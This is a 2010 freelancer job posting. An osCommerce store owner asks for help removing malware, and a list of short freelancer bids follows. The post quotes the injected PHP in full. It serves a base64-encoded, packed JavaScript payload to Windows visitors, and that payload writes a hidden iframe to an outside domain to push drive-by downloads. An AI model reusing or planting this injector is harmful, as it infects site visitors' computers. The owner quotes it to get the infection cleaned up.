oscommerce site with Malaware

In Progress Posted Sep 27, 2010 Paid on delivery

$30-250 USD

Paid on delivery

In Progress Paid on delivery

Hello,

My oscommerce website is infected with a hidden Malaware.

When you log on to my website you see this error:

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home1/ajdreams/public_html/includes/[login to view URL]) in /home1/ajdreams/public_html/includes/functions/[login to view URL] on line 97

and you refresh the page the error disapears, and this following code appears (not always):

^ j•™j¤kSôXJAU(p(QU,o08õP=c„aŸC"Gƒ‚(_/f2{clù~I?”6s˜fi2+4£Ho•oœiAk£¦)ZO\9n]2./ñ÷‚?rOYD |ü*m§Bp’f•=oj(õPAuB‚*PH$€SVg44''=c…1ku&oT~û*.;3sZ &«Ktl2¢–a6'fzHo–?h›E“t¢ü%N1:fTf[\ó,ZnpyQ @RSü*n

I was checking through the files, and a weird code keeps adding itself on [login to view URL] (even when i delete it, it reappears 10 min later):

*/

/**start PHNjcmlwdCBsYW5ndWFnZT0nSmF2YVNjcmlwdCc+ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUsZCl7ZT1mdW5jdGlvbihjKXtyZXR1cm4gYy50b1N0cmluZygzNil9O2lmKCEnJy5yZXBsYWNlKC9eLyxTdHJpbmcpKXt3aGlsZShjLS0pe2RbYy50b1N0cmluZyhhKV09a1tjXXx8Yy50b1N0cmluZyhhKX1rPVtmdW5jdGlvbihlKXtyZXR1cm4gZFtlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKXtpZihrW2NdKXtwPXAucmVwbGFjZShuZXcgUmVnRXhwKCdcXGInK2UoYykrJ1xcYicsJ2cnKSxrW2NdKX19cmV0dXJuIHB9KCc2LjcoXCc8MiA1PSI0Oi8vMy44LjkvIiBiPSIxIiBjPSIxIiBhPSIwIj48LzI+XCcpOycsMTMsMTMsJ3x8aWZyYW1lfHVsdGltYXRlNTh8aHR0cHxzcmN8ZG9jdW1lbnR8d3JpdGV8Y298Y2N8ZnJhbWVib3JkZXJ8d2lkdGh8aGVpZ2h0Jy5zcGxpdCgnfCcpLDAse30pKTs8L3NjcmlwdD4= end**/

$__name = md5($_SERVER['HTTP_HOST']);

$reg = "(Win16)|(Windows 95)|(Win95)|(Windows_95)|(Windows 98)|(Win98)|(Windows NT 5.0)|(Windows 2000)|(Windows NT 5.1)|(Windows XP)|(Windows NT 5.2)|(Windows NT 6.0)|(Windows NT 7.0)|(Windows NT 4.0)|(WinNT4.0)|(WinNT)|(Windows NT)|(Windows ME)";

if(empty ($_COOKIE[$__name]) AND eregi($reg, $_SERVER['HTTP_USER_AGENT'])) {

$date = date("D, j M Y 00:00:00", time()+60*60*24*30);

$cookie = time().".".rand(1111111, 9999999);

$set_js = @setcookie ($__name, $cookie, time()+60*60*24*30);

if(!$set_js)

echo '<script type="text/javascript">[login to view URL] = "'.$__name.'="+escape(\''.$cookie.'\')+"; expires='.$date.'; path=/";</script>';

$__content = file_get_contents(__FILE__);

preg_match("#\*start(.*?)end\*#is", $__content, $__m);

if(isset($__m[1]) and trim($__m[1])!="" and preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', trim($__m[1]))) {

echo base64_decode($__m[1]);

}

elseif(isset($__m[1]) and trim($__m[1])!="") {

echo $__m[1];

}

}

unset ($__name);

Some of my visitors told me that, programs are downloaded automatically to their computer. When they use firefox, their browser crashes.

And on top of all when i was checking through my files i noticed an unknown PHP file. ([login to view URL]). It's in fact a login portal to somewhere in my website (it had a username and password area, when you click on cancel it sends you to google russia), but I've deleted it.

Please bid if you only have experience.

Thanks

JavaScript MySQL OSCommerce PHP Shopping Carts

Project ID: #807567

About the project

16 proposals Remote project Active Oct 11, 2010

Looking to make some money?

Benefits of bidding on Freelancer

Set your budget and timeframe
Get paid for your work
Outline your proposal
It's free to sign up and bid on jobs

16 freelancers are bidding on average $89 for this job

WSTIBS's Profile Picture
WSTIBS

we offer quality solution,time base completion with support. ***** Check PMB ***** Best Regard

$100 USD in 1 day
(137 Reviews)
8.0
Zeldaze's Profile Picture
Zeldaze

Hi, I'm an experienced osCommerce developer and I have experience in virus removal and future protection. Ready to get started.

$149 USD in 0 days
(329 Reviews)
7.2
eelance's Profile Picture
eelance

i can fix that for you.

$30 USD in 1 day
(444 Reviews)
7.0
soniamit's Profile Picture
soniamit

Please see pm............ Regards soNia

$150 USD in 2 days
(193 Reviews)
6.6
IceStormz's Profile Picture
IceStormz

please check pm

$50 USD in 0 days
(78 Reviews)
6.2
tuxadmin's Profile Picture
tuxadmin

Hi, see my profile for security-related issues, thanks. Escrow payment required.

$75 USD in 2 days
(102 Reviews)
6.4
anode's Profile Picture
anode

I have fixed similar problems before. Ready to start right away.

$100 USD in 2 days
(136 Reviews)
6.3
ashisha100's Profile Picture
ashisha100

Can start immediately, Please check PMB.

$100 USD in 2 days
(50 Reviews)
6.4
devd22's Profile Picture
devd22

Hi, I am interested in this project. Thanks

$40 USD in 2 days
(212 Reviews)
5.8
ta3k's Profile Picture
ta3k

see your pmb please

$45 USD in 1 day
(48 Reviews)
5.2
ARNLWEB's Profile Picture
ARNLWEB

Expert here, let's get started, thank you.

$61 USD in 7 days
(22 Reviews)
4.5
zeromiletech's Profile Picture
zeromiletech

Ready to start. Check PMB..

$35 USD in 1 day
(2 Reviews)
1.9
sankalplondon6's Profile Picture
sankalplondon6

Please let me know when we have to start the work for u We r on Skype add me as sankalpsaxena7

$35 USD in 1 day
(0 Reviews)
0.0
Kazumasa6769's Profile Picture
Kazumasa6769

Hi, kindly check your inbox.

$100 USD in 2 days
(0 Reviews)
0.0
jzm's Profile Picture
jzm

I have already removed malware of this type in the past week

$250 USD in 3 days
(0 Reviews)
0.0
huzit's Profile Picture
huzit

Hi, i am ready to get it done for you. Thank you!

$100 USD in 1 day
(0 Reviews)
0.0
Post a project like this